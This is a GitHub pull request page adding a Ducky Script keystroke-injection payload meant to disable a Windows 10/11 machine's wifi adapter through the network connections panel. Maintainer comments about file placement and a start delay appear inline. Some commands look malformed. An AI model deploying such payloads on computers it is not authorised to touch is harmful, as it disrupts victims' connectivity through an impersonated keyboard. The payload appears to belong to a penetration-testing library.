Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

windows wifi adabter disable #426

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
46 changes: 46 additions & 0 deletions windows wifi disable/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
REM Title: windows disable wifi Version 1
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is placed incorrectly. make sure that its located in payloads/library/CATAGORY/PAYLOAD-NAME

Also folders and file name cannot contain spaces. Please use - or _ instead of space.

REM Author: youssef mohamed fathy
REM Description: disable windoes wifi connection
REM Target: windows 10 ,11

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Consider adding a start delay. The computer needs time to register a new HID device before it takes keystrokes.

If your target is windows you can also use EXTENSION PASSIVE_WINDOWS_DETECT

GUI r


DELAY 500

WINDOWS-r


STRING ncpa.cpl


Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I would remove these random spaces.


ENTER

DELAY 3000

RIGHTARROW


RIGHTARROW

RIGHTARROW

DELAY2000

SHIFT-F0



DOWNARROW


ENTER

DELAY 1000

ALT-F4

ALT-F4

ENTER